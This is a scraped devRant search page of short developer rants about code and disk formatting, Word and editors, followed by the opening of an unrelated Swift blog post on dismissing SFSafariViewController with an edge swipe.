By default, session cookies written by WIF are protected via DPAPI, taking advantage of the RP's machine key. Such cookies are completely opaque to the client and anybody else who does not have access to that specific machine key. This works well when all the requests in the context of a user session are aimed at the same machine: but what happens when the RP is hosted on multiple machines, for example in a load balanced environment? A session cookie might be created on one machine and sent to a different machine at the next postback: unless the two machines share the same machine key, a cookie originated from machine A will be unreadable from machine B.

There are various solutions to the situation. One obvious one is using sticky sessions, that is to say guaranteeing that a session beginning with machine A will keep referring to A for all the subsequent requests. I am not a big fan of that solution, as it dampens the advantages of using a load balanced environment. Furthermore, you may not always have a say in the matter: if you are hosting your applications on third party infrastructure (such as Windows Azure) your control of the environment will be limited. Another solution would be synchronizing the machine keys of every machine. I like this better than sticky sessions, but there is one that I like even better. More often than not your RP application will use SSL, which means that you need to make the certificate and corresponding private key available on every node: it makes perfect sense to use the same cryptographic material for securing the cookie in a load-balancer-friendly way. WIF makes the process of applying the strategy above in ASP.NET applications really trivial: the following code illustrates how it could be done (the handler body below is reconstructed from the description that follows).

public class Global : System.Web.HttpApplication
{
    void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
    {
        // Replace the default DPAPI transforms with RSA-based ones
        // keyed to the RP's service certificate.
        var sessionTransforms = new List<CookieTransform>(new CookieTransform[] {
            new DeflateCookieTransform(),
            new RsaEncryptionCookieTransform(e.ServiceConfiguration.ServiceCertificate),
            new RsaSignatureCookieTransform(e.ServiceConfiguration.ServiceCertificate) });
        e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(
            new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly()));
    }

    protected void Application_Start(object sender, EventArgs e)
    {
        FederatedAuthentication.ServiceConfigurationCreated += OnServiceConfigurationCreated;
    }
}

Instead of the usual inline approach, this time I am showing you the codebehind file global.asax.cs. OnServiceConfigurationCreated is, surprise surprise, a handler for the ServiceConfigurationCreated event and fires just after WIF reads the configuration: if we make changes here, we have the guarantee that they will be applied from the very first request coming in.

Note: It is worth noting that, contrary to what various samples out there would lead you to believe, OnServiceConfigurationCreated is pretty much the only WIF event handler that should be associated with its event in Application_Start. This has to do with the way (and the number of times) in which ASP.NET invokes the handlers through the application lifetime.

The code is pretty self-explanatory. It creates a new list of CookieTransform, which takes care of cookie compression, encryption and signature. The last two take advantage of the RsaxxxxCookieTransform, taking as input the certificate defined for the RP in the web.config.

Note: Why do we sign the cookie? Wouldn't it be enough to encrypt it? If we use the RP certificate, encryption would not be enough. Remember, the RP certificate is a public key.
If we just encrypted, a crafty client could discard the session cookie, create a new one with super-privileges in the claims, and encrypt it with the RP certificate. If encryption were the only requirement, the RP would not be able to tell the difference. Adding the signature successfully prevents this attack, as it requires a private key which is not available to the client or anybody else but the RP itself.

The new transformations list is assigned to a new SessionSecurityTokenHandler instance, which is then used for overriding the existing session handler: from now on, all session cookies will be handled using the new strategy. That's it! As long as you remember to add an entry for the service certificate in the RP configuration, you've got NLB-friendly sessions without having to resort to compromises such as sticky sessions.

Thanks for the excellent post. I will try this out.

Great post. I would like to point out one caveat when doing sliding expiration in SessionAuthenticationModule_SessionSecurityTokenReceived. If your ASP.NET code uses ASP.NET impersonation via web.config (ours did) and touches any Windows-secured resource in this event (i.e. SQL), it will happen under the identity context of the app pool user and not the ASP.NET impersonated user. We found this out the hard way and had to ditch ASP.NET impersonation and switch to just setting our app identity on the IIS application pool. Would be nice if the WIF docs / samples mentioned something to this effect.

Hi Vittorio. I'm using .NET 4.5 and I was wondering if these solutions would be any different with the new Framework? Can you point me in the right direction?
https://blogs.msdn.microsoft.com/vbertocci/2010/06/16/warning-sliding-sessions-are-closer-than-they-appear/
CC-MAIN-2016-50
en
refinedweb
ImageConverter

Since: BlackBerry 10.0.0

#include <bb/utility/ImageConverter>

To link against this class, add the following line to your .pro file: LIBS += -lbbutility

Encodes and decodes images to and from different sources in various formats. Images may be stored in memory or stored in local files. Image formats are denoted using mime types, such as "image/png", "image/jpeg", and so on, or by the file extension of a given path, such as ".png", ".jpg", and so on. The list of supported formats depends on the codecs that are installed on a device at a particular time. You can use img_codec_list(), which is part of the C library, to get a complete list of installed codecs. For more information on C APIs, see the platform's C library documentation.

Here's how to use the ImageConverter class to decode a PNG image:

ImageData image = ImageConverter::decode("foo.png");

In addition to decoding images, this class also contains functionality for encoding images into a specific format (PNG, JPEG, and so on).

Public functions:
- ImageConverter() - Creates a new instance of the ImageConverter class. (Since BlackBerry 10.0.0)
- ~ImageConverter() - Destructor. (Since BlackBerry 10.0.0)

Static public functions:
- ImageData decode(...) - Returns the newly created ImageData. If the image could not be loaded, ImageData::isValid() will return false. (Since BlackBerry 10.0.0)
- ImageData decode(...) - Decodes from encoded data, which can be in any number of formats (PNG, JPEG, and so on). Returns the newly created ImageData; if the file could not be loaded, ImageData::isValid() will return false. (Since BlackBerry 10.0.0)
- QByteArray encode(...) - Converts an image into an encoded format (PNG, JPEG, and so on). Returns the encoded image data; if the image could not be encoded, the returned QByteArray will be empty. (Since BlackBerry 10.0.0)
- bool encode(...) - Converts an image into an encoded format (PNG, JPEG, and so on). Returns true if the image was encoded successfully, false otherwise. (Since BlackBerry 10.0.0)
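A short sketch of round-tripping an image through this class. The overload signatures are abbreviated on this page, so the mime-type and quality arguments below are assumptions based on the descriptions above, not confirmed signatures:

#include <bb/utility/ImageConverter>
#include <bb/ImageData>
#include <QByteArray>
#include <QDebug>

using namespace bb;
using namespace bb::utility;

void roundTrip()
{
    // Decode a PNG from disk; isValid() tells us whether loading worked.
    ImageData image = ImageConverter::decode("foo.png");
    if (!image.isValid()) {
        qWarning() << "could not decode foo.png";
        return;
    }

    // Re-encode as JPEG; an empty QByteArray signals failure.
    // (The mime-type/quality parameters here are assumed.)
    QByteArray jpeg = ImageConverter::encode("image/jpeg", image, 75);
    if (jpeg.isEmpty()) {
        qWarning() << "encoding failed";
    }
}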
https://developer.blackberry.com/native/reference/cascades/bb__utility__imageconverter.html
CC-MAIN-2016-50
en
refinedweb
The world of KIO metadata - checking the HTTP response from a server

Recently, I had one problem: how could I check the HTTP response? I knew already that the various ioslaves can store metadata, consisting of key-value pairs which are specific to the slave used. Normally you can get the whole map by accessing the metaData function of the job you have used, in the slot connected to the result signal. For some reason, however, in PyKDE4 calling metaData() triggers an assert in SIP, which ends in a crash (at least in my application; I still need to debug further). KIO jobs also have the queryMetaData function, which returns the value of the key you have queried. Unfortunately, I had no way to find the key names, until I came across DESIGN.metadata (link is for the branch version). After checking with webSVN, that was exactly the thing I was looking for! It lists all the keys for the metadata, indicating also which ioslave they belong to. After that, the solution was easy. Of course I'm not leaving you hanging there, and now I'll show you how, in PyKDE4, you can quickly check for the server response:

[python]
from PyKDE4.kio import KIO
from PyQt4.QtCore import SIGNAL
[…]

class my_widget(QWidget):
    […]
[/python]

This snippet does a few things. Firstly, it gets the specified URL, using KIO.get (KIO.stat doesn't set the required metadata). Notice that the call is not wrapped in the new-style PyQt API because result (KJob *) isn't wrapped like that (there's a bug open for that). In any case, the signal passes to the connecting slot (slot_result) where we first check if there's an error (perhaps the address didn't exist?) and then we use queryMetaData("responsecode") to get the actual response code. If you want to do error checking based on the result, bear in mind that KIO operates asynchronously, so you should use a signal to tell your application whether the result is what it expected. I wonder if this should be documented in Techbase…

Luca Beltrame
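Since the snippet above lost its body in transit, here is a sketch of what the description implies it contained. The slot name slot_result and the queryMetaData key come from the post itself; the method and widget details are my assumptions:

from PyKDE4.kio import KIO
from PyKDE4.kdecore import KUrl
from PyQt4.QtCore import SIGNAL
from PyQt4.QtGui import QWidget

class my_widget(QWidget):

    def check_response(self, url):
        # KIO.get sets the HTTP metadata we need (KIO.stat does not)
        job = KIO.get(KUrl(url), KIO.NoReload, KIO.HideProgressInfo)
        # Old-style connect, since result (KJob *) is not wrapped new-style
        self.connect(job, SIGNAL("result (KJob *)"), self.slot_result)

    def slot_result(self, job):
        if job.error():
            print "Error:", job.errorString()
            return
        # "responsecode" is the key listed in DESIGN.metadata
        print "HTTP response code:", job.queryMetaData("responsecode")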
https://www.dennogumi.org/2010/02/the-world-of-kio-metadata-checking-the-http-response-from-a-server/
CC-MAIN-2016-50
en
refinedweb
Hey Guys, I am a new student to Java and I am working on an assignment for school. I am not looking for anyone to do my work for me, just some guidance on what I can do to fix the problem. I have done research on this issue on google and visited various sites without getting the information I am looking for. I have contacted my professor as well, but he is usually very slow at responding to my questions. I am running out of time for this assignment and I would like to fix this bug before submitting the assignment. Okay, now that the formalities are out of the way, here is the code that I have written thus far: import java.util.Scanner; public class CalculateGrade { public static void main(String[] args) { //main method calls AssignvalueToArray method, and AssignValueToArray method calls //DisplayvalueInArray method //create a Scanner object for input Scanner keyboard = new Scanner(System.in); System.out.print("Enter the number of students: "); int studentNum = keyboard.nextInt(); System.out.println(); System.out.print("Enter the number of Exams: "); int studentExamNo = keyboard.nextInt(); AssignValueToArray(studentNum, studentExamNo); } //This method assigns students' scores to a two dimensional array public static void AssignValueToArray(int studentNumber, int numberOfExam) { int[][] studentScore = new int[studentNumber][numberOfExam]; Scanner keyboardForArray = new Scanner(System.in); int studCount = 1; for (int index = 0; index < studentNumber; index++) { System.out.println ("Please type in student " + studCount + " 's grades: " ); for(int indexOfExam=0; indexOfExam < numberOfExam; indexOfExam++) { studentScore[index][indexOfExam] = keyboardForArray.nextInt(); studCount++; } DisplayvalueInArray(studentScore); } } //this method displays student score in the two dimensional array public static void DisplayvalueInArray(int[][] studentScoreArray) { System.out.println ("The students' scores are: " + "\n"); int studentCount = 1; for (int index = 0; index < studentScoreArray.length; index++) { System.out.print("Grades for student " + studentCount +": "); for (int indexOfExam = 0; indexOfExam < studentScoreArray[index].length; indexOfExam++) { char letterGrade; if (studentScoreArray[index][indexOfExam] <= 59) { letterGrade = 'F'; } else if (studentScoreArray[index][indexOfExam] >= 60 && studentScoreArray[index][indexOfExam] <=69) { letterGrade = 'D'; } else if (studentScoreArray[index][indexOfExam] >= 70 && studentScoreArray[index][indexOfExam] <=79) { letterGrade = 'C'; } else if (studentScoreArray[index][indexOfExam] >= 80 && studentScoreArray[index][indexOfExam] <= 89) { letterGrade = 'B'; } else letterGrade = 'A'; System.out.print(studentScoreArray[index][indexOfExam]+"\t"); System.out.print(letterGrade); } System.out.println(); studentCount++; } } } The purpose of this program is to take the number of students and number of exams from the user, as well as the number grades, and then output the students grade and letter grade when the user has finished inputting the data. 
The problem I am running into is when I input more than one student's grades I get this as the output:

Enter the number of students: 2

Enter the number of Exams: 2

Please type in student 1 's grades:
88
75

The students' scores are:

Grades for student 1: 88 B	75 C
Grades for student 2: 0 F	0 F
Please type in student 3 's grades:

After I insert student three's grades I get this output:

Please type in student 3 's grades:
66
88

The students' scores are:

Grades for student 1: 88 B	75 C
Grades for student 2: 66 D	88 B

So, it skips the third student's grades, but outputs the grades as student two's. I am not sure if this bug is being caused within the array or when the program gets the letter grade from the inputted number grade. Any help you guys can give me on this problem would be much appreciated, and thank you all in advance.
https://www.daniweb.com/programming/software-development/threads/371372/java-two-dimensional-array-problem
CC-MAIN-2016-50
en
refinedweb
Hello to everyone, I recently started to learn C++ with the book "Jumping into C++" by Alex Allain. In this book there is an example of a program to get the prime numbers from 0 to 100 that I'm not understanding! From what I think I understood, the second loop, in the function "isPrime", is going to try to divide every number generated by the first loop in "main" by everything from 2 up to the number itself, using the modulus operator in the function "isDivisible". A prime number is a number that only has itself and 1 as divisors, but how can the modulus operator "see" which numbers have only themselves and 1 as divisors? If someone could explain the steps of this program to me I would be very grateful. Here's the code:

#include <iostream>

// note the use of function prototypes
bool isDivisible (int number, int divisor);
bool isPrime (int number);

using namespace std;

int main (){
    for ( int i = 0; i < 100; i++ ){
        if ( isPrime( i ) ){
            cout << i << endl;
        }
    }
    system("pause");
}

bool isPrime (int number)
{
    for ( int i = 2; i < number; i++){
        if ( isDivisible( number, i ) ){
            return false;
        }
    }
    return true;
}

bool isDivisible (int number, int divisor){
    return number % divisor == 0;
}
https://www.daniweb.com/programming/software-development/threads/442634/doubt-about-getting-prime-numbers-0-to-100
CC-MAIN-2016-50
en
refinedweb
Q: So be honest, I promise I won't tell anybody: Which one do you like best? Java or .NET?

Whitepaper by Ted Neward, Spring 2007, InfoQ.com/j+n

For almost a half-decade now, since the release of Microsoft's .NET Framework, as one of those few experts fluent in both the Java/J2EE and .NET platforms, I've been speaking on the topic of Java/.NET interoperability. And regardless of the venue or the audience, one question (from friends, attendees and consulting clients alike) continues to appear at the top of the Frequently Asked Questions list for this topic:

Q: So be honest, I promise I won't tell anybody: Which one do you like best? Java or .NET?

I don't have a favorite; I love them both the same. To be honest, it's not an entirely truthful answer, so it's time to come clean, and go on the record as to which one I prefer.

A: It depends.

A deep divide has fallen across our industry around the basic question of "Which platform do you use?" Are you a Java developer, or a .NET developer? By the tone of some of the discussions held on this topic, one might think this is the major discussion topic of the day, complete with flaring tempers and heated discourse to match. Forget the classic debates of eminent domain vs imperial aggression, or those issues the mainstream media thinks important, like the growing instability in Iraq or the Horn of Africa: if we measure the emotional energy involved, clearly the world's first and most important issue is that of whether you spend the majority of your programming time in Eclipse or Visual Studio.

The truly ironic thing about these debates, interestingly enough, is that they're entirely pointless: Java and .NET, while strikingly similar on several points, are in fact two entirely distinct and different platforms, each with their corresponding strengths and weaknesses. Each platform developed (or evolved) in accordance with the community and culture around it, and as such, each platform looks to solve different problems, in different ways, using different approaches. What's more, the platforms themselves have begun to diverge in recent years.
Both WCF and JAX-WS have been written with the notion of passing messages, not objects at their core, despite the surface-level APIs that would make them seem more like RMI or.net Remoting, making each a good choice for building Web services that will interoperate well. The obvious advantage of this scenario is that each technology focuses on the parts that it does well: the front-end is delivered via a technology that is particular to the platform and can thus take full advantage of its capabilities, and the back-end is written in a platform that has earned a reputation for performance and scalability. With the release of SQL Server 2005 came a new messaging implementation, SQL Server Service Broker, to use in building message-based communication applications. Implemented on top of SQL Server s database engine (the queues in Service Broker are effectively tables with a thin veneer on top of them) and taking full advantage of that robustness to provide transactional and ordered delivery guarantees, Service Broker offers developers a compelling messaging platform, particularly in those data centers where a database is already present. Accessing Service Broker from Java, however, is not that much more difficult than any other sort of JDBC-based access against SQL Server. A Java application be it a client app or another serverbased processing engine can access Service Broker through the Microsoft SQL Server 2005 JDBC driver (available for free download from MSDN) and either send messages to a Service Broker service, or receive messages from a Service Broker service, as necessary. In this example, a fictitious apartment complex wants to Web-enable the generation of work orders for its maintenance personnel, so that renters needn t call the office to place a ticket (and thereby take up valuable office personnel time filling out paper forms in triplicate; office personnel have enough of a hard time ignoring tenants as it is). As such, the solution provider has built a very simple and lightweight Web-based system with two JSP pages: one for renters to place tickets into the service, and a second for maintenance personnel to gather the tickets up and view them. The intent of the system is simple: the first JSP form takes the 3 ticket information, such as the description of the problem, the apartment itself, the tenant s name and phone #, and so on, and queues that information into a ServiceBroker queue, where it resides until Maintenance staff access the second JSP form to get a list of pending work to be done. Speaking to the implementation, in many respects, from the Java perspective, working with ServiceBroker is not much different from working with any other JDBC-fronted database; to put messages into the queue requires only a JDBC call into the SQL Server instance, much as a traditional INSERT or UPDATE would be written:!!""#$$%&'(%) *+%,-..-/ %0(%123 23%2% 4252%() *% %( ) 5(7%(82%2-) 47%(82%99) % 7 7 8%( ) /+(: )9,:3- Fetching a message from the queue is similarly straightforward, using the SQL Server RECEIVE keyword: (%%28%04 ;<0&.) ;#5(7) :: (:,::< /#, = :/!) A A reasonable question would center around the use of SQL Server s Service Broker here, instead of a more Java-friendly JMS implementation, such as the open-source ActiveMQ or commercial SonicMQ implementations. While it would be easy to fall back on the usual Java/.NET interop answer, We do it because we have to, there s a more compelling reason here: conversations. 
ServiceBroker provides a new feature as yet unseen in the JMS specification, that of the conversation : similar in some ways to transacted message delivery, a conversation represents a sequence of messages back and forth, and carries a unique identifier for each conversation. In essence, it s a halfway point between a flurry of RPC calls and independent, individually-tracked messages. It provides for a degree of reliability and robustness not typically found in messaged communication systems. Although in our fictitious example above, the use of conversation is somewhat arbitrary, it can be particularly powerful in longer-running business processes. The conversationid identifier, in the code above, is unique across the ServiceBroker instance, and identifies this collection of messages (just one, in this case) for this particular user interaction. 4 Another reasonable question would center around the use of JSP as the web front-end in place of ASP.NET; again, while it would be tempting to simply cite a have to reason such as using non- Windows platform to host the Web tier, JSP offers a compelling reason in its own right, in that there is a wealth of tools and prebuilt componentry for producing nice-looking Web applications. If we extend the discussion to all of the Java/Web space, tools like Struts, Seam, WebWork, JSF, Google Web Toolkit, and more make the Web development experience distinctive from the traditional dragand-drop approach offered up by ASP.NET. (While drag-and-drop may work for inexperienced Web developers, practiced Web designers have usually found their own approaches they prefer, and find that ASP.NET s design practices clash with their own.) For a more detailed discussion of SQL Server Service Broker, please see A Developer s Guide to SQL Server 2005 by Beauchemin and Sullivan. For a more detailed discussion of Servlets and JSP, see Java Servlets and Java Server Pages by Jayson Faulkner and Kevin Jones. For a more detailed discussion of JDBC, see The JDBC Tutorial and API Reference, Third Edition, by Fisher, Ellis and Bruce. Though it may pain some of the more zealous open-source advocates to hear this, Microsoft Office represents, without a doubt, the world s most popular office productivity suite over the last decade. In many respects, it is the most-installed piece of software in the world, second perhaps only to Windows itself. For a few years now, the Java community has discussed richer client applications, moving away from the click-wait-read cycle of systems built around the Web and towards a more interactive style of user interface. AJAX certainly enables some of this, at the (sometimes prohibitive) cost of having to write potentially complex scripting code to deal with different browsers and browser versions. Some in the Java community have posited the Eclipse Rich Client Platform as a solution, others push JavaWebStart, or Adobe Flex, and so on. The best rich client is the one based on the software already pre-installed on the end-user s machine. Given that Office is almost always preinstalled, particularly on machines within a corporate environment, why not use the incredible extensibility interfaces in Office, and use Office as the rich client, with Java as the back end? Whole forests have been clear-cut in order to produce the myriad books, papers, tutorials and reference documentation on the Office object model and how to use it, both from.net and unmanaged COM, so duplicating that information here would be counterproductive. 
Instead, this paper will focus on a single part of Office s extensibility model, that of the Smart Tag, and in particular, the Smart Tag List, a predefined Smart Tag that uses an XML definition file to recognize text in an Office document (typically Excel or Word, though PowerPoint and Access are also able to use Smart Tag Lists) and offer a small drop-down menu that will lead users off to a Web site. In this case, the fictitious scenario is simple: an online e-tailer has found their online pet shop to be wildly successful (having finally solved the problem of shipping pets through surface mail by negotiating deals with local pet shops around the world), and their portal, based on the Spring JPetStore example, now needs to handle all sorts of complex calculations and business rules as defined by the accountants and marketers within the company. The simple orders are easily left to the portal, but more complex orders will be handled by salespeople, either in person or over the phone. 5 Complex calculation rules demand a complex processing language to handle them, and this is exactly the kind of scenario that Excel was created for in fact, both the accountants and marketers can write the rules in Excel s formula language themselves and so we want to take the next step of enabling the Excel spreadsheet to act as the front-end to the Spring portal. In this case, the first step is simply to recognize the order and product numbers in the Excel document, and display a Smart Tag that takes the salesperson over to the appropriate page on the Spring-powered Website. (Future enhancements could automatically place the order when the spreadsheet is saved, or pop warning messages when trying to sell pets that the store is currently out of, and so on.) Doing this is actually more an exercise in writing a simple XML file than it is in writing Java or.net code; thanks to the flexible nature of URLs, the smart tag list can remain blissfully unaware of the fact that the website behind the URL is implemented in Spring. The Smart Tag List document, shown below, even refreshes itself every day, on the grounds that new product IDs may come available ( Look, kids, we now stock ferrets! ). 6 ?5!,!5#-!""#"" E' H <-:!#H/H!! J-H 5HKHC>.5HKHCB.52H5LHC>.52H5LHCB.('H2HCB.('H HC>?5!:!#H/H!! J-H @?5! <-:!#H/H!! Picking this apart briefly, we re essentially setting up two smart tags, one to recognize the Product IDs (FL-DSH-01, and so forth), and a second to recognize Item IDs (EST-16, EST-17, etc). In each case, we simply surf over to the website, passing the ID in place of the {TEXT} placeholder in the URL. Here, the IDs are hardcoded, but notice how the <updateurl> tag lists a.jsp page the JSP code there queries the underlying database for all Product and Item IDs and lists them out when it sends back a new copy of this Smart Tag List document (which Office will silently copy over the original, located in the C:\Program Files\Common Files\Microsoft Shared\Smart Tag\Lists directory). Office knows to update this Smart Tag List every 5 minutes, because the Smart Tag List defines itself to be updateable (as given by both the <updateable> and <autoupdate> tags above), and that it should query for an update every 5 minutes (as given by the <updatefrequency> tag). This means that, silently, the smart tag will update itself as new products and items are introduced into the database, without any manual user intervention required. 
7 Smart tags are far more powerful than this simple example leads us to believe; the Visual Studio Tools for Office API allows the.net developer to write any sort of code behind a smart tag desired, so it s not infeasible to imagine issuing a remote call (whether a Web Service call or through a commercial toolkit, such as JNBridge or ZeroC s ICE) to the JPetStore engine to obtain current inventory counts at the time of the smart tag s activation, and so on. Additionally, smart tags are hardly the end of Office s integration capabilities; the document pane can be customized to provide another user interface into any Java system, Excel s formula language can be extended by custom formulae (which, of course, could either host the JVM locally to make use of Java APis or else call out to Java systems to do the same), and so on. And this need not all go one way if desired, Word or Excel itself can be hosted inside of the Eclipse RCP, as can any COM Automation object, where all of the features of Word and Excel will still remain available. Certainly, these aren t the only scenarios possible, just the few that came to mind during recent discussions and client meetings. Other scenarios include: PowerShell using Cmdlets that speak to Java. PowerShell is poised to become the most important administration tool for Windows for the near future, and it would be a relatively trivial exercise to build a set of Cmdlets that interrogated Java servers using JMX. This would make it possible simple, even to build scripts that checked both the status and performance of IIS- and Javabased servers with a single script, commingling the results into a nice graph (such as those produced by the cmdlets from PowerGadgets), or to be able to turn on and off various parts of the system via method calls. Java using Speech Server. Vista has some new speech synthesis capabilities, and Microsoft s Speech Server offers some powerful speech-analysis capabilities that currently don t exist in the Java platform. As we become more aware of physical disabilities in our users, speech and interacting with users through voice (whether over a phone or through a microphone in front of the computer) becomes more and more attractive. Workflow activities calling Java. Windows Workflow has a prebuilt activity that calls out to a Web service already, but, as mentioned earlier, Web services are useful under certain circumstances, but are hardly a panacea for all interoperability tasks. Custom activities could make use of other Java/.NET interoperability approaches to talk to Java components. Java hosting Workflow. One of the most powerful facets of the Workflow engine is its ability to be hosted in a variety of environments, such as ASP.NET. Certainly, there s no reason why the Workflow engine couldn t be hosted inside of a Java process, such as Tomcat or Jetty, thus enabling Workflow s information worker accessibility to reach out to both Java and.netbased web applications. Windows Mobile devices interoperating with Java. As the mobile device world heats up, Microsoft s Windows Mobile platform stands as a viable platform for writing software to run on mobile devices, such as the Smartphone. As these devices become more ubiquitous, it s natural that IT departments will want to integrate them into their already-heterogeneous environments, which means Java will likely be involved. 
Sometimes this communication will be over Web services, but in some situations a more focused communication method will be necessary, such as using a proprietary toolkit like JNBridge Pro or ZeroC s ICE. As more and more developers come to realize the power of using both.net and Java together, more scenarios will likely come to light. And as both the Java and.net communities come out with more innovative ideas, these will create even more reasons for each side to openly and honestly consider 8 how to use the other to best solve our clients problems. Because, after all, in the end, regardless of which technology you love more, that s what we re about: providing solutions to our clients.!! Ted Neward is the principal of Neward & Associates, a consulting group that focuses on enterprise systems using Java,.NET, XML, and other tools as necessary. He has been using C++ since 1991, Java since 1997, and.net since, and can be found on the Web at ) Java and.net represent the extensive share of enterprise development. At we are hosting and continually posting that will help you learn how. This whitepaper was produced for the InfoQ Java +.NET portal.! * +,$ It s important to acknowledge that readers of this paper will generally have experience and knowledge of one of the two sides, not both. For that reason, a laundry list of the major components of both platforms appears below. This isn t intended as any sort of overview of explanation of those components, nor is it an exhaustive list; readers are encouraged to consult the Bibliography at the end of this paper for more on each topic. Java: Java 5 Enterprise Edition. Recently renamed from its former moniker Java2 Enterprise Edition and still commonly referred to as J2EE, this specification is an umbrella specification, bringing together dozens of other enterprise-scope specifications. Although incorrect, many use the term J2EE as synonymous to EJB. Enterprise JavaBeans (3.0). EJB is a specification describing a container into which software components seeking lifecycle, connection and distributed transaction management are deployed. It is fair to characterize EJB as the logical Java successor to transaction-processing mainframe systems. JDBC (4.0). The Java standard call-level interface API to relational database implementations. Different vendors provide different providers (drivers) which implement the JDBC API, thus allowing the programmer to remain ignorant (and, theoretically, loosely-coupled) to the actual database implementation. Servlets (2.5). The Servlet specification describes a container into which software components designed to build dynamic HTTP/web pages are deployed. A Servlet is essentially a Java class extending a particular interface. Java Server Pages (2.2). JSP pages are an output-oriented way to create servlets, similar in the way that ASP or ColdFusion pages look. JSP files are then translated into Java source (servlets) and compiled. Remote Method Invocation. RMI is Java s object remote-procedure-call (ORPC) stack. RMI has two flavors, one using a native Java wire format, called RMI/JRMP, and the other using 9 OMG s CORBA wire format, called RMI/IIOP. Officially, J2EE systems are encouraged to use RMI/IIOP, but in practice RMI/JRMP use is more widespread. Java Message Service (1.1). JMS is an API for standard access to any messaging service (not to be confused with service) for the Java platform. JavaMail. JavaMail is an API for standard access to any (SMTP, POP3, IMAP, and so on) service. Java Naming and Directory Interface. 
Java Naming and Directory Interface. The standard Java API for any service that provides naming and/or directory services, such as LDAP.

Java WebStart. A deployment technology where applications can be launched locally from an HTTP URL, and stored on the client machine for future (offline if desired) execution.

Java API for XML Binding (2.0). JAXB is the standard API for automated Java-to-XML/XML-to-Java transformation.

Java API for XML Web Services (2.0). JAX-WS is the standard API for Java XML-based web services. Originally, JAX-WS was called the Java API for XML RPC (JAX-RPC), but that name was deprecated in the 2.0 release as JAX-WS incorporates a more message-oriented approach.

Spring (2.0). A de facto standard open-source container providing lighter-weight services to Java components (also known as POJOs, short for Plain Old Java Objects). Widely considered the replacement for J2EE.

Swing. Officially known as Java Foundation Classes, Swing is a cross-platform user interface toolkit for building rich-client UIs. Because it seeks to create visual consistency across platforms, Swing implements most of its own painting and display logic.

Standard Widget Toolkit. The UI technology at the heart of the open-source Eclipse IDE, SWT is another UI toolkit, different from Swing in that it relies on native OS-level UI facilities to do its painting and display logic.

.NET:

Windows Communication Foundation. Once code-named Indigo, WCF represents Microsoft's next-generation API for doing any sort of program-to-program communication, from message queuing to secure/reliable/transacted services to WS-* web services.

Windows Presentation Foundation. Once code-named Avalon, WPF represents Microsoft's next-generation presentation layer, looking to take advantage of the huge hardware investments the industry has made in graphics cards over the years. WPF code can be used in two forms, either called-and-compiled as per normal .NET development, or written declaratively using an XML dialect called XML Application Markup Language (XAML) that can either be compiled into the application or sent over HTTP requests to IE 7 browsers for dynamic display. A subset of WPF, called WPF/E, has been released for use by non-IE browsers.

Windows Workflow Foundation. Workflow, as it's commonly called, provides …

Windows Forms. The .NET wrapper around the traditional Windows UI facilities (User32.dll and GDI32.dll).

Active Directory. AD is a directory service intended for enterprise-wide deployment of named resources, such as users and servers. AD also comes in a lighter-weight version for per-application use called ADAM.

ASP.NET. The .NET implementation for creating dynamic Web/HTTP facilities. The ASP.NET pipeline provides both programmatic (ASHX) and output-oriented (ASPX) forms for producing end-user visual content, as well as programmatic Web services (ASMX).

ADO.NET. The call-level interface API to relational database implementations. Different vendors provide different providers (drivers) which implement the ADO.NET API, thus allowing the programmer to remain ignorant of (and, theoretically, loosely coupled to) the actual database implementation.

.NET Remoting. .NET's object remote-procedure-call (ORPC) technology.

Microsoft Message Queue (4.0). MSMQ is Microsoft's messaging service, available for all recent versions of Windows (4.0 ships with Vista).
COM+/Enterprise Services. COM+ is the container providing transaction and lifecycle services into which managed applications (as they were originally known) are deployed. .NET components use COM+ through the System.EnterpriseServices namespace.

Microsoft Office. The world's most widely-installed office-productivity suite; its principal parts consist primarily of Microsoft Word, Microsoft Excel, Microsoft PowerPoint and Microsoft Outlook.
http://docplayer.net/303183-Q-so-be-honest-i-promise-i-won-t-tell-anybody-which-one-do-you-like-best-java-or-net.html
CC-MAIN-2016-50
en
refinedweb
Cry about... .Net / VB.Net Troubleshooting

Type '<component-name>' is not defined

Symptom:

When compiling a VB.Net application the compiler generates the following error:

Type 'CCCC' is not defined.

If you are using C# then the error is slightly different:

The type or namespace name 'CCCC' could not be found (are you missing a using directive or an assembly reference?)

In both cases 'CCCC' is the name of a component. The definition of the component exists in the project, and in the code behind the component is either being created dynamically, such as:

Dim aControl As MyComponent = LoadControl("MyComponent.ascx")

or simply referenced, such as:

Private _mine As New List(Of MyComponent)

either of these giving rise to the error:

Type 'MyComponent' is not defined.

To further complicate things, whilst this error may be observed when building the project, in some cases the project can be built without error, with the error only manifesting itself when the project is published.

If you get this error when it is not related to a component defined in your project then see my notes for "Type <type-name> is not defined (or which namespace do I need for type X?)".

Whilst these notes are primarily aimed at VB.Net they are also applicable to C#.

Cause:

The compiler cannot find the component of type 'CCCC'. (Why it might sometimes be able to find the component when building but not when publishing is a mystery to me!)

Remedy:

- If the component is being dynamically created in the code behind for a form or for another component then add an explicit reference to the control in the form's (or control's) definition. Do this by adding a "<%@ Register ..." directive at the top of the page, for example:

<%@ Register src="MyComponent.ascx" tagname="MyComponent" tagprefix="uc11" %>

This example is correct assuming the component is called "MyComponent" and the source code for it is in the file "MyComponent.ascx".

- An even easier way of doing this is to drop the component onto the form (or component) and then delete the instance off the form. This will leave behind the necessary register directive.

These notes are believed to be correct for VB.Net for Visual Studio 2008 and Visual Studio 2010 and may apply to other versions as well.

About the author: Brian Cryer is a dedicated software developer and webmaster. For his day job he develops websites and desktop applications as well as providing IT services. He moonlights as a technical author and consultant.
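Putting the remedy together: a minimal sketch of how the directive and the code behind fit, assuming a hypothetical user control in MyComponent.ascx hosted on a page containing a PlaceHolder1 control (names are illustrative, not from the article). Note that with Option Strict On the dynamic creation also needs the CType shown, because LoadControl returns the base Control type:

<%@ Register src="MyComponent.ascx" tagname="MyComponent" tagprefix="uc11" %>

' In the page's code behind, both usages now compile:
Private _mine As New List(Of MyComponent)   ' plain reference

Private Sub LoadIt()
    ' dynamic creation; CType narrows the Control returned by LoadControl
    Dim aControl As MyComponent = _
        CType(LoadControl("MyComponent.ascx"), MyComponent)
    PlaceHolder1.Controls.Add(aControl)
End Sub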
http://www.cryer.co.uk/brian/mswinswdev/ms_vbnet_component_name_not_defined.htm
CC-MAIN-2016-50
en
refinedweb
